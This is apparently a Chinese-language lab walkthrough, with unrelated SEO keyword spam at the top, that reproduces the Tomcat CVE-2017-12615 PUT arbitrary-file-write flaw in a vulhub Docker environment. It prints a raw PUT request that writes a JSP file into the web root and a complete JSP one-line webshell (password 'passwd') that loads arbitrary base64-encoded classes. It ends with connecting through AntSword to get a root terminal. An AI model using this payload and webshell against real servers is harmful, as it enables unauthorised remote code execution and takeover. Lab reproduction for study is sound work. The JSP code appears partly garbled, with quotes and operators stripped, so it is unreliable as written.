免费企业建网站,家装公司十大口碑排名,韶关房地产网站建设,去势 wordpressTomcat 任意写文件PUT方法 (CVE-2017-12615) 文章目录 Tomcat 任意写文件PUT方法 (CVE-2017-12615)1 在线漏洞解读:2 版本影响3 环境搭建4 漏洞复现4.1 访问4.2 POC攻击点4.2.1 直接发送以下数据包#xff0c;然后shell将被写入Web根目录。4.2.2 访问是否通#xff0c;可以访…Tomcat 任意写文件PUT方法 (CVE-2017-12615) 文章目录 Tomcat 任意写文件PUT方法 (CVE-2017-12615)1 在线漏洞解读:2 版本影响3 环境搭建4 漏洞复现4.1 访问4.2 POC攻击点4.2.1 直接发送以下数据包然后shell将被写入Web根目录。4.2.2 访问是否通可以访问到文件 5 漏洞利用5.1 上传jsp一句话5.2 kali打开蚁剑5.3 连接jsp一句话木马密码为 passwd5.4 打开终端获取root 1 在线漏洞解读:
https://vulhub.org/#/environments/tomcat/CVE-2017-12615/2 版本影响
Tomcat version: 8.5.19
3 环境搭建
cd /home/kali/vulhub/tomcat/CVE-2017-12615环境启动
sudo docker-compose up -dsudo docker ps -a已启动访问端口8091 4 漏洞复现
4.1 访问
4.1 访问http://192.168.225.166:8091/看到Tomcat示例页面发现8.5.19版本后台管理是不允许登录的 4.2 POC攻击点
4.2.1 直接发送以下数据包然后shell将被写入Web根目录。
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5shell4.2.2 访问是否通可以访问到文件 5 漏洞利用
5.1 上传jsp一句话
%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz Class.forName(sun.misc.BASE64Decoder);return (byte[]) clazz.getMethod(decodeBuffer, String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz Class.forName(java.util.Base64);Object decoder clazz.getMethod(getDecoder).invoke(null);return (byte[]) decoder.getClass().getMethod(decode, String.class).invoke(decoder, str);}}
%
%String cls request.getParameter(passwd);if (cls ! null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%5.2 kali打开蚁剑
┌──(kalikali)-[~]
└─$ sudo antsword 5.3 连接jsp一句话木马密码为 passwd 5.4 打开终端获取root